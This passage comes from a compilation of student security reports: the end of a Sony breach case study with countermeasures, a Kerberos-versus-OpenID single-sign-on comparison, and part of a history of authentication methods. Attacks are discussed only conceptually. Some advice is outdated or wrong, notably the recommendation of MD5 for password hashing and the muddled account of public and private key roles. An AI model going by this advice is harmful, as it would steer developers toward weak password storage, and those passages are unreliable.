several services such as Sony PlayStation Network, its Qriocity music streaming service, and Sony Online Entertainment. Large amounts of traffic were sent to the targeted web applications and caused the web server to be unresponsive. The attack caused disruption, making it difficult for their customers to use their services. This caused huge financial losses and their goodwill were adversely affected. Anonymous, a hacktivist group responsible for the attacks, had used botnets and a simple DDOS tool called the Low Orbit Ion Cannon (LOIC) to perform such attacks. From the case study of Sony, we can see how the DDOS attack (discussed in the first section) has been put into practice and how it had affected the whole organization. 5.3.4.1 Countermeasures 5.3.4.1.1 Distributed Denial of Service Establish a Back-Up “Mirror” Website. In our opinion, we believe that Sony should establish a back-up “mirror” website that should be hosted on a different web hosting provider. In the event of a DDoS attack, Sony can replace their affected websites with the back-up “mirror” website. This ensures that Sony‟s customers can still make use of their services, even if the website has been hit by a DDoS attack. 5.3.4.1.2 SQL Injection White Hat Hacker. In our opinion, Sony should hire a white hat hacker who is a computer expert that specializes in penetration testing to find out and fix the vulnerabilities of the system. It would cost far less to perform thorough penetration tests than to suffer the loss of trust, fines, disclosure costs and loss of reputation these incidents have resulted in. Thus, with proper testing of the application, it will prevent such SQL injections. 5.3.4.1.3 Brute Force Attack 151 Incremental Delay. By adding pauses/delay after each attempts of login failure can help Sony to deal with brute force attack. This method is known as incremental delay where the system tracks login failure based on "user session instead of authentication credential basis." It works by adding an additional second to the response time after each user fails to login to their account successfully. For example, if user failed to login during the first attempt, it will delay for one second. If the user failed to login at the second time, the response time will delay by two seconds and so on for the next subsequent login attempts. By adding a few seconds to the response time, it will help to slow down the brute force attack and most importantly, users will not feel irritated especially if they accidentally typed their password wrongly. As compared to the disabling of accounts after multiple tries, this method is considered to be more practical as users do not have to wait for a period of time before they can reactivate their account again. 5.3.4.1.4 Data Theft Perform hashing of password. Since data theft attack occurs mainly due to the unencrypted data, Sony Corporation should consider hashing its users‟ password with the MD5 hashing algorithm before the password is being stored in the database. By hashing the users‟ password, “it will turn the user password “my_password” to something like “0x22cd3f2e3f2e56f7ecf5”. Since hashing is a one way function, it makes it impossible for the attacker to recover the password from the hash even if the attackers have managed to obtain the users‟ password from the database server. In addition, if Sony Corporation is using a unix system, they should also consider incorporating salt for each user in the database to make it more secure. “Salt is a twocharacter string that is stored in the password file along with the encrypted password. With salt, a same password can be encrypted in 4096 ways”. If salt is not being used, it makes it easier for the attacker to” construct a reverse dictionary where it is able to convert the encrypted password back to its original form.” Finally, with the use of hashing and salt, it will prevent the user‟s password from being easily obtained and revealed in plaintext by the attacker. 6. Conclusion In today‟s technology driven marketplace, many businesses have relied on the internet to take advantage of web-based services due to competition. However, they could not rule out the possibility of being targeted as attackers are becoming smarter and stealthier in their methods. As threats are becoming more sophisticated and prevalent, it is fundamental for businesses to prevent from computer network attacks to protect their network security. The attacks that Sony Corporation faced have raised an important lesson for organizations and end users. In this advanced technological world, it is very easy to become a victim of a cybercrime. So as an end user, we should learn to protect ourselves by not becoming an easy target for the hackers and organizations should also protect their customer information. 152 References Kessler, G. C. (2000, November).Distributed denial-of-service. Retrieved from http://www.garykessler.net/library/ddos.html 2. Farrapos, S., Gallon, L., & Owezarski, P. (2005, April).Network security and dos attacks . Retrieved from http://spiderman2.laas.fr/METROSEC/Security_and_DoS.pdf 3. What is ip spoofing and how does it work?. (n.d.). Retrieved from http://www.spamlaws.com/how-IP-spoofing-works.html 4. Velasco, V. (2000, November 21). Introduction to ip spoofing. Retrieved from http://www.sans.org/reading_room/whitepapers/threats/introduction-ipspoofing_959 5. Ip spoofing. (n.d.). Retrieved from http://www.andhrahackers.com/forum/hacking-tut/ip-spoofing/?wap2 6. Hassell, J. (2006, June 8). The top five ways to prevent ip spoofing. Retrieved from http://www.computerworld.com/s/article/9001021/The_top_five_ways_to_ prevent_IP_spoofing 7. Wu, T., Chung, J., Yamat, J., & Richman, J. (n.d.). The ethics (or not) of massive government surveillance. Retrieved from http://www-csfaculty.stanford.edu/~eroberts/cs201/projects/ethics-ofsurveillance/tech_keystrokelogging.html 8. Wikipedia. (n.d.). Keystroke logging. Retrieved from http://en.wikipedia.org/wiki/Keystroke_logging 9. Lien, C., & Chen, C. (n.d.).Keylogger defender. Retrieved from http://www.seas.ucla.edu/~chienchi/reports/CS236_keydef_pp1.pdf 10. Sony Corporation. (2011, October 12). Sony global - announcement regarding unauthorized attempts to verify valid user account on playstation®network, sony entertainment network and sony online entertainment. Retrieved from http://www.sony.net/SonyInfo/News/Press/201110/11-1012E/index.html 11. Sulliva, B. (n.d.). Preventing a brute force or dictionary attack: How to keep the brutes away from your loot . Retrieved fromhttp://www.infosecwriters.com/text_resources/pdf/Brute_Force_BSullivan.p df 12. Technical Info. (n.d.). The phishing guide (part 1) understanding and preventing phishing attacks. Retrieved fromhttp://www.technicalinfo.net/papers/Phishing.html 1. 153 Appendices Appendix A: System Attack Frequency Fig. 1. System Attack Frequency [1] Appendix B: Distributed of Denial Services 154 Fig. 2. Intruder finding a site to compromise [2] Fig. 3. Compromised system with DDoS daemon [2] 155 Fig. 4. Flooded Victim‟s Site [2] Appendix C: Man-in-the-Middle Fig. 5. Phishing Attack [10] 156 Appendix D: Spoofing Fig. 6. The Actual Attack [23] Appendix E: Keylogger Fig. 7. How Keylogging works [32] 157 Fig. 8. Sample Log File Content [33] Fig. 9. PS/2 Keylogger [36] 158 Fig. 10. USB Keylogger [37] Appendix F System Classification Attack Attacks Distributed Denial Of Service IP Spoofing Man-in-the Middle System Attacks and its Estimated Scale of Damage Scale of Reasons Damage (60%) 1 The scale of damage done by DDOS can be very large where it can affect the availability of many big time online sites. For example: The Internet portal Yahoo! has became a victim of a DDoS attack, where it became inaccessible for 3 hours, and it suffered a loss of e-commerce and advertising revenue that amounted to about $500,000. 0.8 The scale of damage done by IP Spoofing based attacks can be quite large. This is because once the IP Spoofing based attacks is successfully launched, attacker will be able to gain unauthorized access to the entire corporate network and steal/ compromise the entire corporation confidential information. 0.6 The attacker has the ability to hijack credentials used in two-factor authentication during online banking services. Online banking customers are robbed off their online identities and may incur financial losses if attacker performs fraudulent transactions directly with the bank using the customers‟ bank accounts. 159 Keylogger (Hardware) 0.4 Total 2.8 Attacks Distributed Denial Of Service IP Spoofing Man In The Middle Keylogger (Hardware) As compared to other attacks, the scale of damage for keylogger attack may not be that large. This is so because it only logged sensitive information on a particular computer. Thus, not much of the information may be recorded. Also, different levels of employees have different access control. Hence, attacker may not be able to record the username and password of the most confidential information. System Attacks and its Associated Complexity Complexity Reasons of Attack (40%) DDOS attack is not very complex. It just needs 0.5 vulnerability in the system, and it can exploit the system. For instance, a stolen account that they have access to. The intruder can use this information to load their DDoS programs onto the host. IP Spoofing is not an actual attack, but rather it is a 1 hijacking technique that cyber-terrorist used to launch various attacks. However, attacks employing IP Spoofing can be very complex. To launch an attack using IP Spoofing, the attacker must first have the technical knowledge of how the different OSI layers, TCP/IP suite and IP structure works. In addition, it must also understand the flaw and security problem of the TCP/IP suite. Other than that, there are a lot of steps involved in any IP Spoofing based attacks where attackers have to find a valid IP and TCP header in order to form and inject the right IP packets and gain unauthorised access to the computer, system and network. Since MITM attacks include different types of 0.8 techniques, the complexity ranges from easy to difficult. An attacker requires knowledge of the specific technique to perform MITM attacks (e.g. DNS, ARP, HTTP, and SSL). Various software such SSLStrip and Cain & Abel can also be used carry out MITM attacks. For example, for a simple MITM attack, a small webserver (to host a phishing website and capture customers credentials) would suffice. The complexity of keylogger attacks is not that 0.4 complex as hardware keylogger is the simplest approach to carry out. Attackers are only required to know which port to connect the connector to. Also it does not require many resources. Attackers can install 160 the keylogger program into the machines easily without any much effort by using the connector. Total Severity Level High Medium Low 2.6% Scale of Damage and Complexity of attack Range 0.8 - 1 0.5 – 0.7 0.1 – 0.4 Appendix G: Other References 13. Ponemon Institute. (2011, August).Second annual cost of cyber crime study. Retrieved from http://www.arcsight.com/collateral/whitepapers/2011_Cost_of_Cyber_Crim e_Study_August.pdf 14. Hines, E., & Gamble, J. (2002, February 25). Non blind ip spoofing and session hijacking: A diary from the garden of good and evil. Retrieved from http://flur.net/archive/research/non-blind-hijacking.pdf 15. Tcp/ip suite weaknesses. (2006, November 11). Retrieved from http://mudji.net/press/?p=152 16. Bao Ho& Toan Tai Vu (2003). Ip spoofing (A study on attacks and countermeasures). Retrieved fromhttp://www.docstoc.com/docs/45752165/IP-spoofing 17. Olza, T. (2008, April). Keystroke logging (keylogging) . Retrieved from http://adventuresinsecurity.com/images/Keystroke_Logging.pdf 18. SpyCop. (n.d.). Hardware keylogger detection. Retrieved from http://spycop.com/keyloggerremoval.htm 19. KeyCarbon. (n.d.). Keystroke recorders for usb keyboards ("keycarbon usb"). Retrieved from http://www.keycarbon.com/products/keycarbon_usb/overview/ 20. Schneier, B. (2008, November 10).Schneier on security: aspidistra. Retrieved from http://www.schneier.com/blog/archives/2008/11/aspidistra.html 21. Wikipedia. (n.d.). Aspidistra (transmitter). Retrieved from http://en.wikipedia.org/wiki/Aspidistra_(transmitter) 161 162 Report for the Study of Single-Sign-On (SSO), an introduction and comparison between Kerberos based SSO and OpenID SSO Xiao Zupao Abstract. Single-Sign-On is a useful technique that allows users to authenticate their identities only once to system and after that it will log in the user automatically. It will reduce a lot of logging time and also reduce the risk of suffering from security problems like phishing. This report will give a brief introduction of the traditional Kerberos based SSO and also a new kind of SSO called OpenID SSO. The report will also do a comparison between these two techniques in varies ways. Keywords: Single-Sign-On, Kerberos, OpenID. 1 Introduction Single-sign-on is a technique that related the access to multiple independent systems. It allows users to log in only once and then access all the independent systems without log in manually. 1.1 Benefits Single-sign-on benefit users in the following several points: It reduce the time spending in typing in username and password It reduce password fatigue as using SSO, user only need to remember one username and password for all the systems involved. It reduce the phishing success since there is no need for users themselves to type in the password where ask for a service. 1.2 Varies implementations Currently there are a lot of ways to implement SSO; I will briefly introduce four of them in this part: 163 Kerberos based SSO Kerberos-based SSO maintains a centralized authentication server that stored all users’ information. User firstly authenticated themselves to this server and the server will give back the user a ticket. User can use the ticket to request services from other independent servers that related with the centralized authentication server. The detail process will be described later in this report. Smart-Card based SSO Users firstly insert the smart card and type in the password to authenticate them. Later when they want to ask for a server, they just insert the card and the authentication will be done by the SSO server. Smart-Card based SSO need a Kerberos Domain Controller (KDC). As I see, the process for smartcard based SSO is just the same as Kerberos based SSO, except that it needs a card which makes the authentication more secure at first stage. But, what if the user authenticates at first then he/she lost the card? Integrated windows authentication Integrated Windows Authentication is a term associated with Microsoft’s product. This is used more commonly for the automatically authenticated connection between Microsoft internet information services and Internet Explorer. Integrated window authentication at first do not prompt for user name and password, instead the browser will exchange the current users’ information with the web server through a cryptographic exchange. If this failed, it will prompt for user name and password. For windows-NT based SSO, the Kerberos protocol is also involved, and it also implement other protocols to make sure that if Kerberos fails, the system still works correctly. OpenID SSO The OpenID SSO is totally different from the above implementations. It does not need a centralized server to work for identifying the user and establishing the authentication between the user and the service server. Users create an account with their preferred OpenID identify providers, and then with this account, the user can sign on to any website that accepts OpenID authentication. I will introduction the detail process in this report. 164 2 2.1 Kerberos based SSO Terminology1 Key Distribution Center (KDC) KDC is a trusted third-party for client and the service server from where the client asks for service. It consisted of two parts, namely Authentication Server and Ticket Granting Server. Authentication Server (AS) AS is the server authenticate the user’s identity. It will make sure that you are you, not anyone else. Kerberos tickets Kerberos ticket is distributed by AS and encrypted with server key. It contains a session key, and contains the corresponding user’s name and a time stamp to indicate when this ticket is valid. Ticket Granting Server (TGS) TGS issue additional tickets Ticket Granting Ticket (TGT) TGT is returned from AS when the first time client authenticates to the AS. Client uses this TGT to get additional tickets from TGS for SS. This TGT has a short life, typically 8 hours. TGT contains Client ID, client network address, ticket valid period, and the client/TGS session key). Server key Server key refer to the key shared by AS and service provided server. Session key Session is a newly generated key with a time stamp. “Newly” means it is generated every time user wants to request a new service. User “User” refers the person who uses the client machine to ask for service. Client 1 Reference: http://en.wikipedia.org/wiki/Kerberos_(protocol) 165 “Client” refers to the machine that user uses. 2.2 How it works?2 1. First stage: user authenticates to AS User enters a username and password on client machine. Client hashes the password, and this becomes the private key for user/client. Client sends a plain text contains user name to AS to request services. AS check whether the user name is in its database. If yes, it will return two messages: 1. 2. Client/TGS session key encrypted using the secret key of client/user. (This secret key is pre store in AS, not provided by the client.) TGT which is encrypted using TGS’s private key. Upon client receive the two messages; it will try to decrypt the first message using the private key generated previously. If it can be decrypted successfully, it means the user is the right person. After decrypt first message, client got the session key to communication with TGS. ─ User authentication process end here, by now, user can ask for any services without type in user name and password. All the verification process with be done by client, KDC and SS automatically. 2. Second stage: user ask for service from SS =======================================================3 When user ask for a service, the client will send two messages to TGS: 1. 2. Compose the encrypted TGT and the ID of the requesting service. Encrypt clients’ ID and time stamp with client/TGS session key got from first stage. When TGS receive the two messages, it will get the encrypted TGT and decrypt it with TGS private key. Then TGS get the TGS/Client session key from TGT. And with this session key, TGS decrypted the second 2 3 Reference: http://en.wikipedia.org/wiki/Single_sign-on; Authentication Service for Computer Network.” “Kerberos: Processes within “===” are doing by the client, KDC and SS, user will not involve. 166 An message from client and get client ID with a time stamp. Then it will send client two messages: 1. 2. Client-to-Server ticket, this contains the client’s information and client/server session key. It is encrypted with service server’s private key. Client/server session key encrypted with client/TGS session key. Client get the two messages and decrypt the second message with client/TGS session key and get client/server session key. Upon doing this, client has enough information to authenticate itself to SS. It send two messages to SS: 1. 2. Encrypted client-to-server ticket (the first message got from TGS) Client ID, timestamp encrypted with the client/server session key. When SS receive the two messages from client, it decrypts the first message using its private key to get the client/server session key. And with this session key, SS can decrypt the second message which contains the client information and a timestamp. Then SS will return to client a message contains the timestamp+1, and this message is encrypted with the client/server session key. This message is a confirmation message. When client receive the confirmation message, it decrypts the message with client/server session key and to check if the timestamp has updated. If yes, then the client can trust the SS. And then, the client can start requesting services. =================================================== The server provided the requested service to client. ─ To now everything is done and the user can enjoy the services without entering username and password again and again. 167 2.3 A diagram show the whole process4 4 Adopted from http://en.wikipedia.org/wiki/File:Kerberos.png The printer is an example of SS. 168 3 OpenID SSO5 3.1 Terminology End-user End-user is the entity who wants to assert a particular identity, namely the OpenID holder. Identifier or OpenID OpenID is a URL or XRI that the end-user holder to prove enduser’s identity. Identifier provider or OpenID provider OpenID provider, “OP”, is the service that provides OpenID registering and authentication, i.e. end-user get OpenID from OP. Relying party Relying party is the service provider, the site that want to verify end-user’s identity. User-agent User-agent is a program used by end-user to communicate with Relying party and OpenID provider, typically a web browser implements Http/1.1. OP Endpoint URL OP Endpoint URL is the URL that accept OpenID authentication. It is obtained from user’s input OpenID identifier. 3.2 How it works?6 When end-user wants to log into a site, he/she will be presented will a login form.7 User responds with the OpenID, i.e., the URL. Relying party receive the URL, and from the URL, it gets the OP endpoint URL. 8 5 Reference from “OpenID Authentication 2.0 –Draft 11”. http://openid.net/specs/openid- authentication-2_0-11.html 6 Reference: http://www.windley.com/archives/2006/04/how_does_openid.shtml 7 Mostly this log in form is some button like Google, yahoo, Facebook, etc. 8 The obtaining process is call “normalizing”. 169 After getting the OP endpoint URL, the relying party communicates with OP to establish a share secret using Diffie-Hellman Key Exchange.9 The relying party redirects the end-user’s browser to the OP with an OpenID authentication request. The OP prompts for a window request end-users name and password to authenticate the end-user.10 End-user sends username and password to OP server.11 If the username and password is correct, end-user authenticated itself to the OP server. Then the OP server will return a form to ask end-user whether trust the relying party or not. End-user responds to the server. Based on end-user’s respondent, OP server will redirect user-agent with different URL provided by relying party. The relying party returns corresponding pages to end-user according to the URL in above step. ─ The relying party authentication ends here. If the user’s username and password of OP is correct and choose to trust the relying party, the user will successful log in to the relying party’s site. 4 Comparison between Kerberos based SSO and OpenID SSO In this part, I will compare the two implementation of SSO in several ways. 9 This step is optional, if the relying party and OP had established connection before, it can be skipped. 10 If end-user had logged into the server before, then this step will be skip. 11 As above, this step will also be skipped. 170 4.1 Environment Kerberos. Because of the need of a centralized KDC, Kerberos based SSO is hard to implement in a large scale. The implementation environment is typically a local intranet like university, company or hospital, etc. OpenID OpenID is implemented in the internet, connecting lots of websites. Currently OpenID supported sites include Google, Facebook, Yahoo, AOL, etc. ─ The implementation environment is quite different for these two SSO technologies. And because of this, the security concern for these two implementations will also be different. o For Kerberos, its largest drawback is that all the information is store in KDC, and if KDC fails, everything would not work, this is not good for information availability. However, for other type of attack like man-in-middle attack, Kerberos can defend them quite well. o For OpenID, the most concerned security issue should be the manin-middle attack. In earlier version of OpenID, it is very weak to protect the attack. In the newest version, developers introduce some techniques like nonce to defend the attack. However it is still cannot solve the problem. A sophisticated hacker can get end-user’s identifier and make use of it easily. 4.2 Encryption Kerberos Kerberos protocol use data encryption standard (DES) encryption during the communication between client, SS and KDC. And it also uses checksum to ensure the integrity. OpenID OpenID support three signature algorithms: 171 1. 2. 3. No encryption. HMAC-SHA1 -160 bit key length12 HMAC-SHA256 -256 bit key length13 ─ From the encryption methods, we can see that both implementations have a good enough algorithm to encrypt the messages to ensure confidentiality. However, for OpenID, we can also see that because it is a new technology, it has not set up a standard. Relying parties may use difference signature algorithm and some even not use, which will increase the risk from being attacked. 4.3 Easy to use? Kerberos based SSO The set-up of Kerberos based SSO is really making life easier for users. It achieves the goal that entering username and password only once and then the system will automatically log the user in to other independent systems. OpenID As far as I see, OpenID is not so convenient to use. Although a lot of the websites join the OpenID standard, most of them still use their own username and password. Even when user wants to log in using OpenID identifier, they need to copy the URL first (at least remembering the URL). For some sites, they will provide some OpenID provider options for user to log in, typically Google, Facebook, Yahoo, etc. This makes things easier to some degree since for a normal user, their account, say, Google account will always in logged in state. However, OpenID is still a great idea. And I think it would be the right way to log to website in the future. 4.4 Any similarities? I always wonder are there any common points between Kerberos and OpenID. So I write out the main working flow of them in a simplified way. Kerberos 12 13 RFC2104 and RFC 3174 RFC2104 and FIPS180-2 172 o o o o o o User enter username and password KDC authenticate the user User request a new service from SS Client (user’s machine) go for KDC for ticket Client gets ticket and sends it to the SS. User get the service OpenID o o o o o o User present a URL to log in to a relying party Relying party go for the OP to authenticate the user. OP prompts a window for username and password.14 User enters the username and password. OP authenticate the user and redirect to relying party User log into the relying party. ─ From above, we can see that Kerberos and OpenID have some similarities. In OpenID, the OP plays the role of KDC and the relying party takes the job of user’s machine to communicate with OP. Kerberos implementations’ biggest drawback is it needs a central server to store all the information and process all the requests. If it is down, everything will fail. Also, OpenID faces the difficulty to protect from man-in-middle attack. So is there any ways to combine these two implementations to provide a better solution? My Kerberos OpenID o o o o o o 14 User wants to log in to a relying party through an OP. User agent (user’s browser or machine) check whether user logged into the OP. if not, prompt for user to log in. If yes, user agent sends the username and relying party URL to OP. OP sends back two messages: First message is client’s information and a session key; they are encrypted with relying party’s private key. Second message is the session key encrypted using user’s password. Client gets the session key using user’s password and sends the first message and a timestamp encrypted with the session key. Relying party gets the two messages, it firstly decrypts the first message to get the session key and client information. It checks client information to ensure that it is not anyone else. And then relying party decrypts the timestamp using the session key, updates If user logged previous, this step would be skipped. 173 o the value and encrypts it with the session again and sends back. At the same time, relying party can log user in. Upon client receive the timestamp, and check it is correct. Then in this stage client also trust the relying party. ─ Except for the first message which contains the user name, other messages are all encrypted with keys. The session key only valid in a short period. And this is very similar to how Kerberos SSO works. ─ Assumes: o Every relying party maintains a table containing the private keys shared by with each of the OPs. o Relying parties trust the OPs. o User trusts the OPs. 5 Conclusion The report has introduced the Kerberos based Single-Sign-On and also a new technology called OpenID. I make a comparison between through implementation environment, encryption methods and also to research that whether it makes users’ life easier. And at the end I make a combination with the two, this conclude the report. 6 1. 2. 3. 4. 5. Reference http://en.wikipedia.org/wiki/Kerberos_(protocol) B.Clifford Neuman, Theodore TS’o: Kerberos: An Authentication Service for Computer Networks. OpenID Authentication 2.0 –Draft 11. http://openid.net/specs/openidauthentication-2_0-11.html#RFC2631 http://en.wikipedia.org/wiki/OpenID. http://www.windley.com/archives/2006/04/how_does_openid.shtml. 174 A Historical Perspective: An Exploration into the Various Authentication Methods Used to Authenticate Users and Systems Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong, Wei Jie Alex Chui National University of Singapore, School of Computing Singapore Abstract. In this paper, we explore the different and major techniques used for authenticating various operating systems and users in a historical perspective. This paper provides an insight using a timeline which gives a clear illustration on how authentication methods have evolved over time. It provides an introduction on the history of each of the authentication technique as well. This paper will also specify on the steps on authenticating users and systems for each authentication method as well as the limitations for some authentication methods. Keywords: Authentication, CA, CP, Encryption, Handshake, Historical, Host-based, IETF, KDC, Kerberos, LDAP, Microsoft Login, MIT, MSCHAP, NTLM, OS, Open Source, Passwords, PKC, PKI, Private Key, Protocols, Public Key, Rhost, SSH-1, SSH-2, SSL, Third-Party, TLS, Transport Layer, UNIX, Windows, X.500 1 Introduction Over the years, there are many different techniques used for authentication. Authentication protocols allow any user to access network resources or logon to a domain after the identity of the user is confirmed. With many different techniques available, using the appropriate method of authentication in different areas becomes the most crucial decision to make in authenticating users and securing of systems. We will look into the various authentication methods below in a chronological order. 2 Timeline of Authentication Methods Used on Different Operating Systems During 1980s and 1990s, many new authentication methods emerged and more improvements were done along the way. The earliest authentication method for users and systems in 1961 which featured log-in commands are the use of passwords. Later on, the usage of passwords has improved from a mere plaintext password to the use of challenge-response passwords. Since there was a need for a trusted authority to certify 175 the trustworthiness of public keys, it urged the usage of Public Key Infrastructure (PKI) in 1969 and subsequently the concepts were publicly released in 1976. The release of Microsoft‟s oldest and first ever authentication protocol, known as the LAN manager, was introduced along with Windows 3.11 in 1992 and it was primarily used in OS earlier than Windows NT 3.1. NTLMv1 and NTLMv2 were successors of LAN manager and were released in the later versions of Windows NT. After the release of Kerberos as open source in 1987, many organizations start to adopt it including Microsoft. Essentially, Kerberos replaced NTLM as the preferred authentication in Windows 2000 and beyond. In 1994, Netscape developed SSL for securing communication sessions and the latest version of SSL, TLS 1.2 (SSL 3.3), was released in 2008 and then further improved in 2011. In early 1995, University of Technology in Finland was a regular victim of password attack sniffing. This prompted one of the researchers in the University to create SSH and SSHv1 to counter that and it was then released to the public as an open source. Next, LDAP is another popular application protocol used for communicating recordbased data and maintain distributed directory information services over a network. LDAP and LDAPv3 came out in 1993 and 1997 respectively. The below diagram illustrates the timeline of the various authentication methods. Figure 1: Timeline on Various Authentication Methods 176 3 Authentication Methods Used on Operating Systems 3.1 Passwords 3.1.1 Introduction to Passwords Passwords are the most basic and widely used form of authentication. In IT, passwords are commonly used with usernames for better security and accessing certain things such as accounts and documents. Passwords can be stored both as plaintext as well as being encrypted by different algorithms and do not necessarily need to be in the form of words. As passwords rely on secrecy, it is encouraged to implement encryption for passwords for better security. However, password authentications are open to several vulnerabilities which can be exploited by methods such as social engineering, password sniffing, man-in-the-middle attacks, dictionary, brute force and birthday paradox attack [1]. 3.1.2 Passwords from a Historical Perspective In the context of computing and Information Technology, Massachusetts Institute of Technology (MIT) created the first ever system with a log-in command that prompts the user for a password in 1961 [2]. In the past, passwords were stored as plaintext in a database on the same server. This was the one of the oldest and weakest authentication method. As passwords were sent in clear text from the clients to the server, anyone who can intercept this connection would be able to retrieve the exact password. The one-way hash function was introduced for the better improvement and security of passwords. However, if someone was able to intercept the hashed password during authentication, the password can be compromised after it has been deciphered. Therefore, another improvement was made to add on to password security which was the use of Challenge-Response passwords [2]. 3.2 Public Key Infrastructure (PKI) 3.2.1 Introduction to PKI Public Key Infrastructure (PKI) is based on a third-party trust system. This third-party trust system that assures the identity of an individual or other entity is who they claim they are, is called a Certificate Authority (CA). The non-repudiation evidence is contained in a digital certificate that has been signed digitally by the CA. Therefore, two parties that do not have any relationship with one another can then trust the identity of each other. One example of this kind of certification is to authenticate to a compute resource whereby a user presents this digital certificate as its non-repudiation proof instead of using passwords. A Certificate Policy (CP) assures the communication parties to trust the CA. It also states policies by stating how the CA establishes identities as well as how it manages the keys and certificates. The CA generates certificates, publishes them, and publishes the revocation lists that are utilized as a means to reject compromised keys. The Current PKI implementation use certificates based on the X.509 V3 standard for 177 interoperability between implementations [3]. PKI supports the use of public key encryption on an insecure public network such as the Internet to securely and privately exchange data. It assumes the use of public and private cryptography key pairs that is obtained and shared through a trusted authority by authenticating a message sender or encrypting a message [4]. 3.2.2 PKI from a Historical Perspective The use and concepts of Public Key Infrastructure was released in 1969 by Ellis and British scientist in GCHQ [5]. Whitfield Diffie and Martin Hellman from Stanford University and Ralph Merkle from the University of California at Berkeley were the first researchers to uncover and publicly disclose concepts of PKI with Public Key Cryptography (PKC) in 1976 titled "New Directions in Cryptography". The Diffie-Hellman-Merkle public and private key exchange algorithm also paved the way for the implantation for secure public distributions which did not implement digital signatures. A year later, Ronald L. Rivest, Adi Shamir, and Leonard M. Adleman, another team of mathematicians from MIT found a way to apply Diffie and Hellman's theories in the real world context and named their encryption method RSA by combining the initials of their names. RSA was the basis of using the multiplication of prime numbers to for a large number that is difficult to reduce. Therefore, it is harder to crack and exactly fitting the requirement for a practical public key cryptography implementation [6]. 3.2.3 Public Key Cryptography/Public-Key Encryption Public key cryptography requires extensive knowledge as it is based on extremely complex mathematical issues and it uses two keys, namely a public and private key. The private key is used for the encryption and decryption of messages sent between communicating systems. The public key is used for encryption and verification of signatures. Public keys are made available to the public and are published in public directories on the Internet for easy retrieval. This is one of the advantages of public key cryptography and it also makes key management efforts easier. With the public key disclosed to the Internet, the integrity of it is critical and is assured by the completion of certification process by a certification authority (CA). Once the public key is certified by the CA, the CA will sign the keys digitally and therefore protecting people from accessing the files as they can trust that it is certified. Both the private and public keys are created concurrently using the same algorithm by the CA. The private key is issued to requesting parties and the public key can be accessed from a public directory for all parties [7]. The private key is never shared or sent to anybody across the Internet. The private key is used for decrypting texts that have been encrypted with the receiver's public key. Thus, users can find out a public key from a central administrator or online public directories and use them to encrypt a message. Upon the reception of a message, it is decrypted with the receiver's private key. In 178 addition to encrypting messages, the private key ensures non-repudiation by using it to encrypt a digital certificate. When the message is sent with the encrypted digital certificate, it can be decrypted with the sender's public key [4]. Here's a table that restates it: Task Use Whose? Key Used? Send an unencrypted message Use the Receiver‟s Public key Send an encrypted signature Use the Sender‟s Private key Decrypt an encrypted message Use the Receiver‟s Private key Decrypt an encrypted signature (and authenticate the sender) Use the Sender‟s Public key 3.3 Kerberos 3.3.1 Introduction to Kerberos Kerberos was developed based on the Needham and Schroeder authentication protocol and it is a trusted third-party authentication service that provides authentication on an open network. All of the clients that use Kerberos will trust its accurate judgment in identifying of each of its other clients and therefore it is trusted. Timestamps are also added to the existing model by Needham and Schroeder to check for replay as the message could be stolen from the network and being resent afterward [8]. 3.3.2 Kerberos from a Historical Perspective Massachusetts's Institute of Technology (MIT) started the development of Kerberos in the 1983 as part of Project Athena and it had become an IETF standard in 1993. Since MIT release Kerberos as open source in 1987, many organizations had adopted the use of it. Kerberos is a popular network authentication protocol that is used by Microsoft, Apple, Red Hat and Sun and many more [9]. Also, Windows 2000 and Windows XP uses Kerberos as their authentication method by default because of two underlying reasons. Kerberos is open source and allow Microsoft to create its own extensions to Kerberos for Microsoft's applications and Kerberos is reliable for network authentication [10]. Kerberos authentication replaced NTLM as the preferred authentication protocol in an active directory based single sign-on scheme for Windows 2000 and above. 3.3.3 How Kerberos protocol work? Kerberos holds a database of its clients and their secret keys and the secret keys are only known to both the Kerberos and the client that the secret key belongs to. If the client happens to be a user, the secret key would be his encrypted password. Both the network services and clients have to register with Kerberos before they are able to use 179 its services also the secret key was negotiated during registration. Since Kerberos hold the secret keys of clients, it can convince one client about the identity of another client and also Kerberos will create session keys for transmission of messages between two clients [8]. The below shows the steps on how Kerberos work: 1) Firstly, the client sends a request to the authentication service (AS) which verifies the client by looking at their database for the client's ID. Next the AS will create a session key (SK 1) and encrypt it with the client's secret key. Afterward the AS will create a ticket-granting ticket (TGT) by using the ticket-granting server's (TGS) secret key. 2) The client will then decrypt the message to get the session key and uses it to create an authenticator. The client will send both the authenticator and the TGT to the TGS to request access to the target server. The TGS will decrypt the TGT to obtain a session key to decrypt the authenticator in order to verify the client. After verification, the TGS will create a new session key (SK 2) by encrypting it with SK1 along with a session ticket that is encrypted by the service server's secret key. 3) After that, the client will create an authenticator by using SK2 and send it to the service server along with the session ticket. For application that require two-way authentication, the service server will send back a message that is encrypted with SK2 and thus complete the authentication. 4) Lastly, both the client and server will use a symmetric key which they both know through authentication for transmitting data [11]. 3.3.4 Kerberos Weaknesses Even after several versions of Kerberos have been published Kerberos is still plague by some weakness. a) Replay Attacks In Kerberos Version 4, even with the inclusion of a timestamp in the authenticator and can be difficult, it is still possible to perform a replay attack. Therefore, the replay cache was introduced in Kerberos Version 5 with the intention of preventing such attacks. Authenticator was stored in the servers so the servers would be able to reject any replicas. However, if the attacker was able to copy the ticket and authenticator and send them to the application server before the user was able to send his real request, the attacker would be able to use the service [12]. b) Password Guessing Attacks This attack is not resolved yet in Kerberos Version 5 [14]. The attacker can intercept one of the Kerberos tickets; as the ticket is encrypted with a key that is based on the client‟s password, the attacker may perform a brute force attack to decrypt the ticket. 180 If the attacker is successful in decrypting the ticket, the attacker is able to discover the client‟s password in the process [13]. c) Single Point of Failure The Key Distribution Centre (KDC) is required to be available at all times. If the KDC is down, no one will be able to login or use the services. However, this can be resolved by having more than one Kerberos server [13]. 3.4 NTLM 3.4.1 Introduction to NTLM NTLM is used in various Microsoft network protocol implementations as a suite of Microsoft‟s security protocol that provides users with authentication, integrity and confidentiality. Microsoft's systems uses NTLM as an integrated single sign-on mechanism by using the credentials obtained during the interactive logon process which consists of a domain name, a user name, and the hash of user's password [15]. There are two different type of NTLM authentication. One of them is the interactive NTLM authentication where authentication takes place between the domain controller and the client where the user has to provide his logon detail during the process. The other type is the non-interactive NTLM authentication, where the user that is already logged-on does not have to interactively logon again to gain access to different resources on the server [16]. 3.4.2 NTLM from a Historical Perspective NTLM is the default authentication protocol used for network authentication for Windows OS, Windows NT 4.0, and was replaced by Kerberos as the standard in Windows 2000 [15]. NTLM provides three different challenge-response 